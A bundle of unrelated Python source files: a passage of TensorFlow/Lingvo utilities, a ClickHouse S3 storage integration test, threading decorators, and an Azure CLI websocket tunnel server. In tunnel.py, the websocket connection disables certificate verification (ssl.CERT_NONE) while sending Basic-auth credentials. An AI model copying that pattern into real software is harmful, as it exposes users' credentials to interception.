get_shape = lambda x: x.shape
arg_shapes = Transform(get_shape, args)
compiled = use_xla()
noinline = not compiled
def Backward(op, *args):
assert bak is not None
xs = Pack(sigs.args, op.inputs)
# Note: sigs.rets will be set during the Forward call.
ys = Pack(sigs.rets, op.outputs)
dys = Pack(sigs.rets, args)
with RemoveAssertContext(remove=noinline):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
@tf.Defun(*Flatten(sigs.args), python_grad_func=Backward, noinline=noinline)
def Forward(*args):
for arg, shape in zip(args, Flatten(arg_shapes)):
arg.set_shape(shape)
with RemoveAssertContext(remove=noinline):
rets = fwd(Pack(sigs.args, args))
sigs.rets = Transform(get_dtype, rets)
return Flatten(rets)
sigs.defun = Forward
return sigs
def CallDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
sigs = _DefineDefun(fwd, bak, args)
flat_rets = sigs.defun(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(sigs.rets, flat_rets)
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(loop_state=loop_state)
dtypes = state.Transform(lambda x: x.dtype).Flatten()
@tf.Defun(*dtypes)
def LoopCond(*args):
s = state.Pack(args)
return cond(s.loop_state)
@tf.Defun(*dtypes)
def LoopBody(*args):
s = state.Pack(args)
s.loop_state = body(s.loop_state)
return s.Flatten()
return state.Pack(
tf.While(input_=state.Flatten(), cond=LoopCond, body=LoopBody)).loop_state
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
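# Example (hypothetical usage sketch): sum the integers 0..9 with ForLoop.
#
#   def Body(i, state):
#     state.total = state.total + tf.cast(i, tf.int32)
#     return state
#   final = ForLoop(Body, start=0, limit=10, delta=1,
#                   loop_state=NestedMap(total=tf.constant(0)))
#   # final.total evaluates to 45.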
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
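# Example (hypothetical usage sketch; note k must be at most 2 here):
#
#   x = tf.constant([[0.1, 0.7, 0.2]])
#   values, indices = TopK(x, k=2)
#   # values  -> [[0.7, 0.2]]
#   # indices -> [[1, 2]]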
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: The variable's TF `Operation`. It could be one of VarHandleOp,
Variable and VariableV2.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type == 'VarHandleOp':
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
assert var_op.type in ['Variable', 'VariableV2']
return var_op.outputs[0]
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')
_get_tpu_summary_tensors = _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY,
lambda: [])
def AddTpuSummaryTensor(name, value, weight=1.0):
"""Adds tensor to global collection of summaries.
This is needed in situations where tf.summary() would normally be used but is
not currently supported. Use py_utils.AddTpuSummaryTensor() in low-level code
to add summary tensors to the global collection of summaries. Then recover
all summary tensors from the global collection by calling
py_utils.GetTpuSummaryTensors() from top-level code (for example, from the
ComputeLoss method of BaseTask).
In addition to the 'name' argument, the current tensorflow name scope is also
captured and added to the metric name. This way, for example, summaries from
a repeated layer will appear as separate graphs in tensorboard.
The weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss
for the exact definition of weight for eval metrics.
Args:
name: metric name
value: metric value tensor
weight: weight tensor for weighted metrics
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
x = NestedMap()
x.name = name
x.value = value, tf.convert_to_tensor(weight)
x.name_scope = tf.get_default_graph().get_name_scope()
tpu_summary_tensors.append(x)
def GetTpuSummaryTensors():
"""Returns summary tensors from global collection.
Returns:
A dict containing str keys and (metric, weight) pairs as values
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
return {
'%s/%s' % (x.name, SanitizeScopeKey(x.name_scope)): x.value
for x in tpu_summary_tensors
}
def ComputationShape(split_size):
"""Decides the computation shape based on the split_size."""
computation_shape = None
if split_size == 1:
computation_shape = [1, 1, 1, 1]
elif split_size == 2:
computation_shape = [1, 1, 1, 2]
elif split_size == 4:
computation_shape = [2, 1, 1, 2]
elif split_size == 8:
computation_shape = [2, 2, 1, 2]
elif split_size == 16:
computation_shape = [4, 2, 1, 2]
elif split_size == 32:
computation_shape = [4, 4, 1, 2]
elif split_size == 64:
computation_shape = [4, 8, 1, 2]
elif split_size == 128:
computation_shape = [8, 8, 1, 2]
elif split_size == 256:
computation_shape = [8, 16, 1, 2]
elif split_size == 512:
computation_shape = [16, 16, 1, 2]
elif split_size == 2048:
computation_shape = [32, 32, 1, 2]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
def GetExtraVars():
"""Returns the captured variables by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.variable_captures
return function.get_extra_vars()
def GetExtraInputs():
"""Returns the captured input tensors by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.external_captures
return function.get_extra_inputs()
def GetExtraArgs():
"""Returns the corresponding function arguments for the captured inputs."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.internal_captures
return function.get_extra_args()
|
test.py
|
import logging
import random
import string
import time
import threading
import os
import pytest
from helpers.cluster import ClickHouseCluster, get_instances_dir
# By default, exceptions thrown in threads are ignored
# (they do not mark the test as failed, they are only printed to stderr).
#
# Wrap threading.Thread and re-raise the exception on join().
class SafeThread(threading.Thread):
def __init__(self, target):
super().__init__()
self.target = target
self.exception = None
def run(self):
try:
self.target()
except Exception as e: # pylint: disable=broad-except
self.exception = e
def join(self, timeout=None):
super().join(timeout)
if self.exception:
raise self.exception
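# Example (hypothetical usage sketch): an exception raised inside the thread
# surfaces on join() instead of only being printed to stderr.
#
#   def boom():
#       raise RuntimeError("failed in thread")
#
#   t = SafeThread(target=boom)
#   t.start()
#   t.join()  # re-raises RuntimeError here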
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/node/configs/config.d/storage_conf.xml'.format(get_instances_dir()))
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node",
main_configs=["configs/config.d/storage_conf.xml",
"configs/config.d/bg_processing_pool_conf.xml"],
with_minio=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
FILES_OVERHEAD = 1
FILES_OVERHEAD_PER_COLUMN = 2 # Data and mark files
FILES_OVERHEAD_PER_PART_WIDE = FILES_OVERHEAD_PER_COLUMN * 3 + 2 + 6 + 1
FILES_OVERHEAD_PER_PART_COMPACT = 10 + 1
def random_string(length):
letters = string.ascii_letters
return ''.join(random.choice(letters) for i in range(length))
def generate_values(date_str, count, sign=1):
data = [[date_str, sign * (i + 1), random_string(10)] for i in range(count)]
data.sort(key=lambda tup: tup[1])
return ",".join(["('{}',{},'{}')".format(x, y, z) for x, y, z in data])
def create_table(cluster, table_name, additional_settings=None):
node = cluster.instances["node"]
create_table_statement = """
CREATE TABLE {} (
dt Date,
id Int64,
data String,
INDEX min_max (id) TYPE minmax GRANULARITY 3
) ENGINE=MergeTree()
PARTITION BY dt
ORDER BY (dt, id)
SETTINGS
storage_policy='s3',
old_parts_lifetime=0,
index_granularity=512
""".format(table_name)
if additional_settings:
create_table_statement += ","
create_table_statement += additional_settings
node.query(create_table_statement)
def wait_for_delete_s3_objects(cluster, expected, timeout=30):
minio = cluster.minio_client
while timeout > 0:
if len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected)
@pytest.fixture(autouse=True)
def drop_table(cluster):
yield
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("DROP TABLE IF EXISTS s3_test NO DELAY")
try:
wait_for_delete_s3_objects(cluster, 0)
finally:
# Remove extra objects to prevent tests cascade failing
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
@pytest.mark.parametrize(
"min_rows_for_wide_part,files_per_part",
[
(0, FILES_OVERHEAD_PER_PART_WIDE),
(8192, FILES_OVERHEAD_PER_PART_COMPACT)
]
)
def test_simple_insert_select(cluster, min_rows_for_wide_part, files_per_part):
create_table(cluster, "s3_test", additional_settings="min_rows_for_wide_part={}".format(min_rows_for_wide_part))
node = cluster.instances["node"]
minio = cluster.minio_client
values1 = generate_values('2020-01-03', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values1))
assert node.query("SELECT * FROM s3_test order by dt, id FORMAT Values") == values1
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part
values2 = generate_values('2020-01-04', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values2))
assert node.query("SELECT * FROM s3_test ORDER BY dt, id FORMAT Values") == values1 + "," + values2
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part * 2
assert node.query("SELECT count(*) FROM s3_test where id = 1 FORMAT Values") == "(2)"
@pytest.mark.parametrize(
"merge_vertical", [False, True]
)
def test_insert_same_partition_and_merge(cluster, merge_vertical):
settings = None
if merge_vertical:
settings = """
vertical_merge_algorithm_min_rows_to_activate=0,
vertical_merge_algorithm_min_columns_to_activate=0
"""
create_table(cluster, "s3_test", additional_settings=settings)
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("SYSTEM STOP MERGES s3_test")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD_PER_PART_WIDE * 6 + FILES_OVERHEAD
node.query("SYSTEM START MERGES s3_test")
# Wait for merges and old parts deletion
for attempt in range(0, 10):
parts_count = node.query("SELECT COUNT(*) FROM system.parts WHERE table = 's3_test' FORMAT Values")
if parts_count == "(1)":
break
if attempt == 9:
assert parts_count == "(1)"
time.sleep(1)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD)
def test_alter_table_columns(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("ALTER TABLE s3_test ADD COLUMN col1 UInt64 DEFAULT 1")
# To ensure parts have merged
node.query("OPTIMIZE TABLE s3_test")
assert node.query("SELECT sum(col1) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(col1) FROM s3_test WHERE id > 0 FORMAT Values") == "(4096)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN)
node.query("ALTER TABLE s3_test MODIFY COLUMN col1 String", settings={"mutations_sync": 2})
assert node.query("SELECT distinct(col1) FROM s3_test FORMAT Values") == "('1')"
# and file with mutation
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN + 1)
node.query("ALTER TABLE s3_test DROP COLUMN col1", settings={"mutations_sync": 2})
# and 2 files with mutations
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + 2)
def test_attach_detach_partition(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test ATTACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DROP PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-04'")
node.query("ALTER TABLE s3_test DROP DETACHED PARTITION '2020-01-04'", settings={"allow_drop_detached": 1})
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_partition_to_another_disk(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 'hdd'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 's3'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
def test_table_manipulations(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("RENAME TABLE s3_test TO s3_renamed")
assert node.query("SELECT count(*) FROM s3_renamed FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("RENAME TABLE s3_renamed TO s3_test")
assert node.query("CHECK TABLE s3_test FORMAT Values") == "(1)"
node.query("DETACH TABLE s3_test")
node.query("ATTACH TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("TRUNCATE TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_replace_partition_to_another_table(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-06', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
create_table(cluster, "s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-03' TO TABLE s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-05' TO TABLE s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Number of objects in S3 should be unchanged.
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4
# Add new partitions to the source table, but with different values, and replace them from the copied table.
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 6
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-03' FROM s3_clone")
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-05' FROM s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Wait for outdated partitions deletion.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4)
node.query("DROP TABLE s3_clone NO DELAY")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
# Data should remain in S3
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("ALTER TABLE s3_test FREEZE")
# The number of S3 objects should be unchanged.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("DROP TABLE s3_test NO DELAY")
# Backup data should remain in S3.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE * 4)
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
def test_freeze_unfreeze(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup1'")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup2'")
node.query("TRUNCATE TABLE s3_test")
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
# Unfreeze single partition from backup1.
node.query("ALTER TABLE s3_test UNFREEZE PARTITION '2020-01-03' WITH NAME 'backup1'")
# Unfreeze all partitions from backup2.
node.query("ALTER TABLE s3_test UNFREEZE WITH NAME 'backup2'")
# Data should be removed from S3.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_s3_disk_apply_new_settings(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
def get_s3_requests():
node.query("SYSTEM FLUSH LOGS")
return int(node.query("SELECT value FROM system.events WHERE event='S3WriteRequestsCount'"))
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
s3_requests_to_write_partition = get_s3_requests() - s3_requests_before
# Force multi-part upload mode.
replace_config("<s3_max_single_part_upload_size>33554432</s3_max_single_part_upload_size>",
"<s3_max_single_part_upload_size>0</s3_max_single_part_upload_size>")
node.query("SYSTEM RELOAD CONFIG")
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096, -1)))
# There should be 3 times more S3 requests because multi-part upload mode uses 3 requests to upload an object.
assert get_s3_requests() - s3_requests_before == s3_requests_to_write_partition * 3
def test_s3_disk_restart_during_load(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 1024 * 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 1024 * 1024, -1)))
def read():
for ii in range(0, 20):
logging.info("Executing %d query", ii)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
logging.info("Query %d executed", ii)
time.sleep(0.2)
def restart_disk():
for iii in range(0, 5):
logging.info("Restarting disk, attempt %d", iii)
node.query("SYSTEM RESTART DISK s3")
logging.info("Disk restarted, attempt %d", iii)
time.sleep(0.5)
threads = []
for i in range(0, 4):
threads.append(SafeThread(target=read))
threads.append(SafeThread(target=restart_disk))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
async.py
|
def run_async(func):
"""
CODE FROM: http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
def run_async_daemon(func):
"""
run_async_daemon(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously) and as a daemon.
Returns the created Thread object.
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.daemon = True
func_hl.start()
return func_hl
return async_func
|
tunnel.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=import-error,unused-import
import sys
import ssl
import socket
import time
import traceback
import logging as logs
from contextlib import closing
from datetime import datetime
from threading import Thread
import websocket
from websocket import create_connection, WebSocket
from knack.util import CLIError
from knack.log import get_logger
logger = get_logger(__name__)
class TunnelWebSocket(WebSocket):
def recv_frame(self):
frame = super(TunnelWebSocket, self).recv_frame()
logger.info('Received frame: %s', frame)
return frame
def recv(self):
data = super(TunnelWebSocket, self).recv()
logger.info('Received websocket data: %s', data)
return data
# pylint: disable=no-member,too-many-instance-attributes,bare-except,no-self-use
class TunnelServer(object):
def __init__(self, local_addr, local_port, remote_addr, remote_user_name, remote_password):
self.local_addr = local_addr
self.local_port = local_port
if self.local_port != 0 and not self.is_port_open():
raise CLIError('Defined port is currently unavailable')
if remote_addr.startswith("https://"):
self.remote_addr = remote_addr[8:]
else:
self.remote_addr = remote_addr
self.remote_user_name = remote_user_name
self.remote_password = remote_password
self.client = None
self.ws = None
logger.info('Creating a socket on port: %s', self.local_port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.info('Setting socket options')
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logger.info('Binding to socket on local address and port')
self.sock.bind((self.local_addr, self.local_port))
if self.local_port == 0:
self.local_port = self.sock.getsockname()[1]
logger.info('Auto-selecting port: %s', self.local_port)
logger.info('Finished initialization')
def create_basic_auth(self):
from base64 import b64encode
basic_auth_string = '{}:{}'.format(self.remote_user_name, self.remote_password).encode()
basic_auth_string = b64encode(basic_auth_string).decode('utf-8')
return basic_auth_string
def is_port_open(self):
is_port_open = False
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
if sock.connect_ex(('', self.local_port)) == 0:
logger.info('Port %s is NOT open', self.local_port)
else:
logger.info('Port %s is open', self.local_port)
is_port_open = True
return is_port_open
def is_webapp_up(self):
import certifi
import urllib3
from azure.cli.core.util import should_disable_connection_verify
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
if should_disable_connection_verify():
http = urllib3.PoolManager(cert_reqs='CERT_NONE')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(self.remote_user_name, self.remote_password))
url = 'https://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx?GetStatus')
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
msg = r.read().decode('utf-8')
logger.info('Status response message: %s', msg)
if 'FAIL' in msg.upper():
logger.info('WARNING - Remote debugging may not be set up properly. Response content: %s', msg)
return False
if 'SUCCESS' in msg.upper():
return True
return False
def _listen(self):
self.sock.listen(100)
index = 0
basic_auth_string = self.create_basic_auth()
while True:
self.client, _address = self.sock.accept()
self.client.settimeout(60 * 60)
host = 'wss://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx')
basic_auth_header = 'Authorization: Basic {}'.format(basic_auth_string)
cli_logger = get_logger() # get CLI logger which has the level set through command lines
is_verbose = any(handler.level <= logs.INFO for handler in cli_logger.handlers)
if is_verbose:
logger.info('Websocket tracing enabled')
websocket.enableTrace(True)
else:
logger.info('Websocket tracing disabled, use --verbose flag to enable')
websocket.enableTrace(False)
self.ws = create_connection(host,
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),),
class_=TunnelWebSocket,
header=[basic_auth_header],
sslopt={'cert_reqs': ssl.CERT_NONE},
timeout=60 * 60,
enable_multithread=True)
logger.info('Websocket, connected status: %s', self.ws.connected)
index = index + 1
logger.info('Got debugger connection... index: %s', index)
